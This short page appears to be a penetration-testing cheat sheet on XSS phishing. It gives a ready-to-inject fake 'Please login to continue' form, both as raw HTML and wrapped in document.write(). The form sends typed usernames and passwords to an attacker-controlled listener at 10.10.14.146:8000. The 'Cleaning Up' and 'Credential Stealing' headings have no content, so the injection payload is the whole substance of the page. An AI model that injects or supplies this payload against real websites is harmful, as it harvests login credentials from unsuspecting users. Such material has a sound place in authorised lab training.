XSS Phishing
Login Form Injection
<h3>Please login to continue</h3>
<form action=http://10.10.14.146:8000>
<input type="username" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<input type="submit" name="submit" value="Login">
</form>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.146:8000><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
Cleaning Up


Credential Stealing

Last updated